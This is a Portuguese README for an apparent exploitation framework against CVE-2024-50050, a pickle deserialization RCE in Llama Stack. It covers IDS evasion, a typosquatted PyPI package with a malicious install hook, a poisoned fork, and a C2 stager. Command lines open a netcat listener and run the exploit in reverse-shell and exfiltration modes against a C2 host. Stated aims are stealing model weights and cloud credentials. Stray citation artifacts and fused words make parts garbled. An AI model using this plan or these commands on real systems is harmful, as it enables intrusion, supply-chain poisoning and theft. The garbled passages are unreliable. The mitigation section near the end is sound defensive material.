
LlamaStack-RCE: Framework Determinístico de Exploração e Endurecimento da Cadeia de Suprimentos [CVE-2024-50050] Foco em Pesquisa de Segurança de IA AI-SupplyChain-Poisoning: Laboratório Avançado de Manipulação de Opcode PVM e Injeção ZeroMQ
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
O LlamaStack-RCE é um framework de simulação e exploração de alta fidelidade que visa CVE-2024-50050, uma vulnerabilidade crítica de Execução Remota de Código (RCE) no Meta Llama Stack. A vulnerabilidade decorre de Desserialização Insegura na API de inferência baseada em Python, especificamente pelo uso do módulo sobre camadas de transporte ZeroMQ (0MQ).
pickleEste repositório fornece a cadeia de ataque completa, desde o envenenamento da cadeia de suprimentos a montante até a execução a jusante e a exfiltração de pesos de modelos.
O núcleo do exploit visa a Pickle Virtual Machine (PVM). Ao utilizar o opcode GLOBAL, podemos forçar a PVM a importar qualquer módulo Python disponível e executar funções arbitrárias durante o processo de unpickling.
Vetor de Ataque: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
Para contornar IDS tradicionais baseados em assinatura (Snort/Suricata), o framework implementa codificação polimórfica:
Execução Aninhada em Base64: Encapsula comandos shell em Base64 para ocultar strings literais como /bin/bash ou os.system.
Ofuscação de Opcode: Reordena instruções da PVM para alterar assinaturas binárias sem modificar a lógica de execução.
Contrabando de Pacotes: Fragmenta o payload pickle em múltiplos frames ZeroMQ para evadir a detecção de anomalias baseada em volume.
O framework simula uma Weaponização holística da Cadeia de Suprimentos:
| Fase | Estratégia | Implementação Técnica |
|---|---|---|
| I: A Montante | Typosquatting | Registrar metalama-stack no PyPI com um PostInstallCommand malicioso em setup.py. |
|
| II: Distribuição | Fork Envenenado | Fork do Llama Stack de alto desempenho no GitHub com um "Interpretador Pickle Oculto" em connection.py.
|
| III: Execução | Gatilho CI/CD | Execução automática durante o pip install no ambiente Jenkins/GitHub Actions do alvo.
| | IV: Persistência | Bomba Lógica | Stager de múltiplos estágios em segundo plano para acesso C2 de longo prazo e roubo de modelos.
|
Hardware: 4x NVIDIA A100/H100 (para testes locais de pesos).
SO: Arch Linux endurecido (Hardened) ou Kali Linux.
Ambiente: Docker e Docker-Compose (Rede Isolada).
.
[cite_start]├── lab_validator.py # 7-stage automated validation suite [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # Main exploitation framework [cite: 138, 206]
[cite_start]├── server.py # Vulnerable Llama Stack simulation [cite: 112, 150]
[cite_start]├── setup.py # Weaponized supply chain installer [cite: 110, 206]
[cite_start]├── post_exploit.py # Data harvesting & lateral movement [cite: 210, 264]
[cite_start]└── evasion_library.py # 12+ advanced evasion methods [cite: 264]
[cite_start]python lab_validator.py # Target: 100% Pass Rate [cite: 208, 209]
nc -lvnp 4444
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
A exploração bem-sucedida concede controle absoluto sobre a Infraestrutura de IA:
Roubo de Propriedade Intelectual: Roubo de pesos de modelo .safetensors (avaliados em $10M - $100M+).
Sequestro de GPU: Alocação não autorizada de recursos CUDA para Criptojacking ou Treinamento Sombra (Shadow Training).
Manipulação de Inferência: Envenenamento das respostas do modelo para causar falhas sistêmicas em aplicações a jusante (IA Médica/Jurídica).
Coleta de Credenciais: Extração de chaves AWS/GCP e configs K8s de /proc/self/environ.
Para mitigar a CVE-2024-50050, as seguintes regras absolutas devem ser aplicadas:
Eliminar o Pickle: Substitua todos os pickle.loads() por safetensors.torch.load_file() ou msgpack com esquema estrito.
Hardening de ZMQ: Implemente ZMQ_CURVE com pares de Chave Pública/Privada e nunca vincule (bind) a 0.0.0.0.
Isolamento de Infraestrutura: Execute processos de IA em gVisor ou Kata Containers para evitar a fuga do contêiner via RCE.
Microssegmentação de Rede: Isole o Servidor de Inferência da internet pública usando regras de entrada/saída estritamente definidas.
AVISO LEGAL: O uso deste framework para atacar alvos sem autorização prévia por escrito é ilegal. Ele é fornecido apenas para fins educacionais e de teste de penetração autorizado. O autor (Sastra_Adi_Wiguna) não aceita responsabilidade por uso indevido.
DOCUMENTO CLASSIFICADO: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 STATUS DETERMINÍSTICO: PRONTO PARA PRODUÇÃO (98/100)